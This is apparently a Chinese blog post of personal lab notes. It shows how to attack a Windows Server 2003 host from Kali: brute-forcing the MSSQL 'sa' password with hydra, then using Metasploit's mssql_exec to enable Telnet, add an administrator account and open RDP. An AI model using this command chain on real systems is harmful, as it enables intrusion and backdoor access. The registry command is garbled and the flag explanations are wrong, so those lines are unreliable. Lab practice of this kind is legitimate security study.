<!-- wp:paragraph -->

<p>攻击机:kaili</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>靶机:windows server 2003 </p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>打开kaili 启动msfconsole </p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>调用模块(mssql_exec)</p>
<!-- /wp:paragraph -->

<!-- wp:code -->

use auxiliary/admin/mssql/mssql_exec #调用mssql_exec模块
show options #查看模块使用**

<!-- /wp:code -->

<!-- wp:image {"id":132} -->
<figure class="wp-block-image"><figcaption>调用mssql_exec 模块,show options</figcaption></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>设置目标地址(RHOST):</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>最新版本的应该是RHOSTS,老版本的是RHOST</p>
<!-- /wp:paragraph -->

<!-- wp:code -->

set rhost 192.168.0.20 #设置目标地址
<!-- /wp:code --> <!-- wp:image {"id":133} --> <figure class="wp-block-image"></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>对了,忘记破解密码了,这也就是利用mysql的数据库账号来进行windows的CMD权限渗透,我自己理解的emmm</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>自己在root下编写个1.txt的密码文档,有现成的也行,我目前我知道数据库的密码,所以我写个简单的密码文件就行,利用hydra这个命令,在新窗口输入,hydra这个命令我也得好好熟悉熟悉</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>爆破密码: 利用hydra用字典爆破</p> <!-- /wp:paragraph --> <!-- wp:code -->
hydra -l sa -P /root/1.txt mssql://192.168.0.20 
#sa是默认用户名,往下看就知道,mssql_exec 模块默认用户名

<!-- /wp:code -->

<!-- wp:image {"id":134} -->
<figure class="wp-block-image"><figcaption>hydra爆破密码</figcaption></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>然后爆破完密码,继续刚才的设置完目标地址后,</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>设置之前爆破出来的密码(PASSWORD)</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>还是进入那个模块(mssql_exec),输入指令</p>
<!-- /wp:paragraph -->

<!-- wp:code -->

set password 123456
<!-- /wp:code --> <!-- wp:image {"id":135} --> <figure class="wp-block-image"><figcaption>设置passowrd</figcaption></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>继续,设置Telnet 服务开启</p> <!-- /wp:paragraph --> <!-- wp:code -->
#设置Telnet服务自动开启
set CMD cmd.exe/c sc config TlnSvr start= auto 
#运行一次
run

<!-- /wp:code -->

<!-- wp:image {"id":136} -->
<figure class="wp-block-image"><figcaption>设置Telnet服务自动开启</figcaption></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>继续,开启Telnet端口(23)</p>
<!-- /wp:paragraph -->

<!-- wp:code -->

#开启Telnet
set CMD cmd.exe /c net start telnet 
#运行一次
run

<!-- /wp:code -->

<!-- wp:paragraph -->
<p>到最后几步了,添加远程用户,然后就可以用过Telnet连接到windows的CMD,</p>
<!-- /wp:paragraph -->

<!-- wp:code -->

#添加windows远程用户
set CMD cmd.exe /c net user yao 123123 /add&net localgroup administrators yao /add

<!-- /wp:code -->

<!-- wp:list -->

  • 注意administrators要加s,不能在忘了!
  • yao是用户名
  • 123123是密码
  • localgroup是组
  • 用kaili Telnet连接不能退格
<!-- /wp:list --> <!-- wp:image {"id":137} --> <figure class="wp-block-image"><figcaption>添加远程用户,我这里账号和密码写错了</figcaption></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>然后使用Telnet远程连接windows的CMD,开启远程连接-3389</p> <!-- /wp:paragraph --> <!-- wp:code -->
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
#CMD命令,开启远程连接3389端口

<!-- /wp:code -->

<!-- wp:list -->

  • /v #路径
  • /t #名称
  • /d #类型
  • /f #值
<!-- /wp:list --> <!-- wp:paragraph {"align":"center"} --> <p style="text-align:center">仅作个人参考</p> <!-- /wp:paragraph -->
最后修改:2019 年 04 月 06 日 02 : 34 PM
如果觉得我的文章对你有用,请随意赞赏